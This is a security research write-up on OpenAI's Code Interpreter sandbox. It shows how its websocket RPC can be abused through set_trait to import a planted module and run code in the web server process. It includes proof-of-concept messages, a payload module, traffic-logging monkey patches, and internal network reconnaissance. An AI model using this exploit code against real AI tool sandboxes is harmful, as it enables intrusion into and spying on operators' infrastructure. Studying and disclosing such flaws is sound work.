Ryan Govostes

The OpenAI Code Interpreter

Background

OpenAI introduced Code Interpreter at OpenAI DevDay 2023 as a tool that assistants such as ChatGPT can invoke "to run code iteratively to solve challenging code and math problems."

The announcement notes that Python code is executed in a "sandboxed execution environment." In June 2024, expanding on the security of its compute infrastructure, OpenAI noted that,

For some higher-risk tasks we use gVisor, a container runtime that provides additional isolation. This defense-in-depth approach ensures robust security and efficient management of workloads.

Executing user-controlled Python code is rightfully considered a "higher-risk task" and hence the Code Interpreter's "user machine" environment runs on top of gVisor, which provides significant isolation from the host cluster node. (This can be confirmed by asking the assistant to report the output of the dmesg command.)

But how, exactly, is the sandbox structured? What mechanism handles code execution and to what extent is it further isolated? To answer these questions, we will look more closely at the Code Interpreter environment.

Vulnerability

The container is launched with the entrypoint /home/sandbox/.openai-internal/user_machine/run-server.sh, which runs exec tini -- python3 -m uvicorn --host 0.0.0.0 --port 8080 user_machine.app:app. This spawns a Python web server as PID 3, hosting the user_machine application built on the FastAPI framework on port 8080.

The application's web API endpoints are the interface by which systems external to the container—for example, cluster monitoring services and the assistant itself—can query or modify the state of the container.

For example, the /check_liveness endpoint is likely used by Kubernetes health checks, and the /upload and /download endpoints are likely used when the assistant ferries user files between the sandbox and the ChatGPT frontend.

[!NOTE]
OpenAI's code is unobfuscated, but comments have been stripped. In lieu of the source files, by default FastAPI serves an OpenAPI spec at /openapi.json containing a listing of endpoints and their parameter types.

A particularly important endpoint is /channel, which is the websocket API over which user code is received and results are passed back out. The application does not execute code directly; instead, it manages several Jupyter kernel subprocesses which are used for out-of-process code evaluation.

Websocket clients control these kernels using remote procedure calls. The design that may be inspired by solutions like Jupyter Kernel Gateway, although it seems to be a bespoke implementation. For certain objects, the application allows the client to call any method with arbitrary, JSON-serializable arguments. (The return value is sent if it too is serializable.) The logic is approximately:

@app.websocket("/channel")
async def channel(websocket: WebSocket):
    request = unpack_message(await websocket.receive_text())
    if request.message_type == "call_request":
        if request.object_reference.type == "multi_kernel_manager":
            target = _MULTI_KERNEL_MANAGER
        elif request.object_reference.type == "kernel_manager":
            target = _MULTI_KERNEL_MANAGER.get_kernel(object_reference.id)
        # elif ...

        value = getattr(target, request.method)(*request.args, **request.kwargs)
        send_reply(request_id=request.request_id, value=value)

By passing the "object reference" multi_kernel_manager, we can call arbitrary methods on the global AsyncMultiKernelManager instance. In the following example, we invoke AsyncMultiKernelManager.list_kernel_ids(). The returned identifers could be passed back to the websocket API with kernel_manager to invoke, say, KernelManager.shutdown_kernel() on a particular instance.

import asyncio
import json
import websockets

message = json.dumps({
    'message_type': 'call_request',
    'object_reference': {'type': 'multi_kernel_manager', 'id': ''},
    'request_id': '06e03bbe-5fb1-41a0-b4f1-33e1d0445ad8',
    'method': 'list_kernel_ids',
    'args': [],
    'kwargs': {},
})

async def main():
    uri = 'ws://localhost:8080/channel'
    async with websockets.connect(uri) as websocket:
        await websocket.send(message)
        await websocket.recv()

asyncio.run(main())

Notably, methods are invoked within the execution context of the application itself, not the Jupyter kernels. This raises the question of whether the RPC dispatch mechanism can be abused to execute arbitrary code within the application process, beyond the seemingly limited API surface of the kernel manager classes.

The AsyncMultiKernelManager class, in the Jupyter codebase, follows the factory method pattern for creating new KernelManager instances:

class AsyncMultiKernelManager(LoggingConfigurable):
    # ...
    kernel_manager_class = DottedObjectName(
        "jupyter_client.ioloop.AsyncIOLoopKernelManager",
        config=True,
        help="""The kernel manager class.  This is configurable to allow
        subclassing of the AsyncKernelManager for customized behavior.
        """,
    )

    @observe("kernel_manager_class")
    def _kernel_manager_class_changed(self, change: t.Any) -> None:
        self.kernel_manager_factory = self._create_kernel_manager_factory()

The implementation uses the Traitlets framework in two ways: First, it declares the factory class as a trait attribute, which can be configured at runtime using Traitlets' configuration machinery. Second, it "observes" the trait attribute and recreates the factory whenever the class changes.

To use trait attributes, AsyncMultiKernelManager subclasses traitlets.HasTraits and hence inherits the set_trait(name, value) method. This can be invoked through the RPC service to replace the kernel manager class and trigger the recreation of the factory.

Careful readers would note that kernel_manager_class is string-like, and not a class reference. The implementation of _create_kernel_manager_factory() uses a utility function from Traitlets to import the class by name from the containing module:

def _create_kernel_manager_factory(self) -> t.Callable:
    kernel_manager_ctor = import_item(self.kernel_manager_class)
    # ...

Therefore, by calling AsyncMultiKernelManager.set_trait("kernel_manager_class", "...") with the name of a Python module, it's possible to trigger the import of that module and hence execute arbitrary code within the web server process.

For example, we can create /home/sandbox/.local/lib/python3.11/site-packages/payload.py to add a new module in Python's search path:

import os
from jupyter_client.ioloop.manager import AsyncIOLoopKernelManager

with open('/home/sandbox/flag', 'w') as f:
    f.write(f'Hello world -- my PID is {os.getpid()}')

Then, we modify the call_request in our earlier proof-of-concept to invoke set_trait() with the factory class trait and a reference to our new payload module:

message = json.dumps({
    'message_type': 'call_request',
    'object_reference': {'type': 'multi_kernel_manager', 'id': ''},
    'request_id': '06e03bbe-5fb1-41a0-b4f1-33e1d0445ad8',
    'method': 'set_trait',
    'args': ['kernel_manager_class', 'payload.AsyncIOLoopKernelManager'],
    'kwargs': {},
})

Afterwards, the assistant will confirm that /home/sandbox/flag contains the string Hello world -- my PID is 3, demonstrating that the code executed within the web server process, not within a Jupyter kernel.

Exploitation

It is reasonable to ask what this code execution as PID 3 gains us. After all, the entire point of this sandbox is to execute arbitrary user code, and the web server process does not hold secrets or higher privileges. What we can now do is intercept traffic to the web server to reveal additional details of Code Interpreter and OpenAI's Kubernetes cluster.

To do so, we inject new middleware to log requests to a file. We also monkey patch the websocket handler to log messages sent and received.

import datetime
import sys

from jupyter_client.ioloop.manager import AsyncIOLoopKernelManager
from starlette.middleware.base import BaseHTTPMiddleware
from starlette.websockets import WebSocket

LOG = open('/home/sandbox/log.txt', 'w')

# Install middleware for logging HTTP requests
async def spy_middleware(request, call_next):
    log = {
        'timestamp': datetime.datetime.now().isoformat(),
        'url': str(request.url),
        'method': request.method,
        'client': request.scope.get('client', {}),
        'request': {
            'headers': dict(request.headers),
            'body': await request.body(),
        },
    }
    try:
        response = await call_next(request)
        body = b''.join([chunk async for chunk in response.body_iterator])
        log['response'] = {
            'status': response.status_code,
            'header': dict(response.headers),
            'body': body,
        }
        return Response(
            content=body,
            status_code=response.status_code,
            headers=dict(response.headers),
            media_type=response.media_type,
        )
    except Exception as e:
        log['exception'] = str(e)
        raise
    finally:
        print(log, file=LOG, flush=True)

app = sys.modules['user_machine.app'].app
app.middleware_stack = BaseHTTPMiddleware(app.middleware_stack, spy_middleware)

# Monkey patch WebSocket class to log traffic
WebSocket.__receive, WebSocket.__send = WebSocket.receive, WebSocket.send

async def websocket_spy_recv(self, *args, **kwargs):
    msg = await self.__receive(*args, **kwargs)
    print({
        'timestamp': datetime.datetime.now().isoformat(),
        'client': self.scope.get('client', ()),
    } | msg, file=LOG, flush=True)
    return msg

async def websocket_spy_send(self, msg, *args, **kwargs):
    print({
        'timestamp': datetime.datetime.now().isoformat(),
        'client': self.scope.get('client', ()),
    } | msg, file=LOG, flush=True)
    return await self.__send(msg, *args, **kwargs)

WebSocket.receive, WebSocket.send = websocket_spy_recv, websocket_spy_send

Traffic Analysis

To generate traffic, I sent several prompts to the assistant intending to have it utilize the Code Interpreter tool and data analysis features, which include client-side rendering of tables and charts.

Request Patterns

There are a few distinct request patterns visible in our log.

In one, the client simply requests a list of running kernels and checks that one is still alive:

<-- method call: multi_kernel_manager.list_kernel_ids()
--> return: ["07d617d8-2845-46...", "42ce8593-1c1b-48...", "90b7f586-8db4-40..."]
<-- method call: multi_kernel_manager.get_kernel("07d617d8-2845-46...")
--> object reference: kernel_manager
<-- method call: kernel_manager.is_alive()
--> return: true

A more complex pattern involves requesting that the kernel execute code. It registers itself as a client of a particular kernel and connects the kernel's ZeroMQ messaging channels to the web socket. The kernel's output is broadcast over this channel and then relayed back to the peer.

<-- method call: multi_kernel_manager.get_kernel("07d617d8-2845-46...")
--> object reference: kernel_manager
<-- register_activity_request
<-- method call: kernel_manager.client()
--> object reference: client
<-- method call: client.start_channels()
--> return: null
<-- method call: client.wait_for_ready(timeout=15.0)
--> return: null
<-- method call: client.execute("# Read the conte...", silent=false, store_history=true, allow_stdin=false)
--> return: "6d9fb2db-cc8887c..."
<-- method call: client.get_iopub_msg(timeout=59.83647584915161)
--> return: {
  "message_type": "call_return_value",
  "request_id": "d430f3cf-418d-4902-a518-16e1dab7d8fe",
  "value": {
    "header": {
      "msg_id": "1231a609-085a1a7212f6f10b67626bae_12_45",
      "msg_type": "status",
      "username": "username",
      "session": "1231a609-085a1a7212f6f10b67626bae",
      "date": "2025-05-15T06:48:57.376542Z",
      "version": "5.3"
    },
    "msg_id": "1231a609-085a1a7212f6f10b67626bae_12_45",
    "msg_type": "status",
    "parent_header": {
      "msg_id": "6d9fb2db-cc8887c847e4a459e3a19ba4_3_1",
      "msg_type": "execute_request",
      "username": "username",
      "session": "6d9fb2db-cc8887c847e4a459e3a19ba4",
      "date": "2025-05-15T06:48:57.374964Z",
      "version": "5.3"
    },
    "metadata": {},
    "content": { "execution_state": "busy" },
    "buffers": []
  }
}

The complexity of these messages is an appealing area of future investigation.

Outside of the websocket, we see the expected requests for /check_liveness. Additionally, the /self_identify, /check_file, /download, and /upload endpoints are invoked during inbound and outbound file transfers.

Callbacks

Notably, the kernel can send a callback to the peer using the same RPC interface. There are 3 callbacks known to us through the ace_tools module within the container. The assistant can inject code, invisible to the end user, like this:

import ace_tools as tools
tools.display_dataframe_to_user(name="A Pandas DataFrame", dataframe=df)

[!NOTE]
The callbacks can be invoked from user-submitted code using ace_tools._call_function(name: str, args: list[Any], kwargs: dict[str, Any]). It is not necessary to run the RPC exploit. Arguments must be JSON serializable.

The three endpoints are:

  • display_dataframe_to_user(path: str, title: str)
  • display_chart_to_user(path: str, title: str, chart_type: str)
  • display_matplotlib_image_to_user(title: str, reason: str, exception_ids: list[str])

To probe if the remote peer also handles calls with getattr(tool, request.method)(*request.args, **request.kwargs), one can invoke tool.__dir__() to retrieve a list of attributes. However, this method is rejected, showing there is an allowlist of functions on the peer.

While the path arguments look like appealing attack vectors, the files are read by the user_machine web app running in our sandbox. The remote peer sends a request to the /download/{path} endpoint to retrieve the file, discussed below.

Further investigation is warranted to discover additional callback methods and probe whether these methods are resistant to malformed parameters.

Network Recon

  • Two liveness checks arrived from 10.130.24.71 with the user agent kube-probe/1.30 exactly 2 minutes apart. This may be the IP address of the cluster node my container pod was executing on.

    Websocket traffic arrived from various hosts in the 10.128.16.0/20 subnet. This may be the pod subnet, though the exact network range may be larger.

    The KUBERNETES_SERVICE_HOST environment variable points to the host 10.0.0.1 within the cluster's service CIDR.

    The DNS configuration in /etc/resolv.conf points to the DNS server at 10.0.0.10, also within the service CIDR. The search domain confirms that we are running on Azure Kubernetes Service and are in the untrusted namespace within the cluster.

  • The network policy appears to prohibit outbound connections. A TCP port scan on each web service client reveals no open ports. The DNS server is also unreachable.

  • Numerous Datadog-related headers, for example x-datadog-trace-id, are present in our inbound HTTP requests. This suggests that a proxy or middleware is modifying our traffic. The Datadog headers or this proxy itself may be future attack vectors.

File Transfers

Requests to /check_file, /upload, and /download, are preceded by one to /self_identify within the same HTTP connection. All responses include an x-ace-self-identify header with a unique identifier set at provisioning time.

This is likely a safety feature intended to prevent cross-contamination of user data if the application identity changes because the container IP address has been re-used. The client will also abort the operation if the connection is closed after /self_identify, avoiding a potential time-of-check to time-of-use data leak vulnerability.

Prior to downloading a file from the sandbox, an HTTP request is made to the /check_file/{path} API:

{
  "message_type": "check_file_response",
  "exists": true,
  "too_large": false,
  "size": 222,
  "user_machine_exists": true
}

The size field must be consistent with the content length of the subsequent /download request.

Conclusion

OpenAI’s Code Interpreter sandbox is designed as an untrusted environment to run user code with strong isolation from the rest of their infrastructure. Despite this, our analysis shows that compromising the sandbox’s web application process does allow an attacker to perform valuable reconnaissance on the internal workings of the Code Interpreter tool and its Kubernetes environment.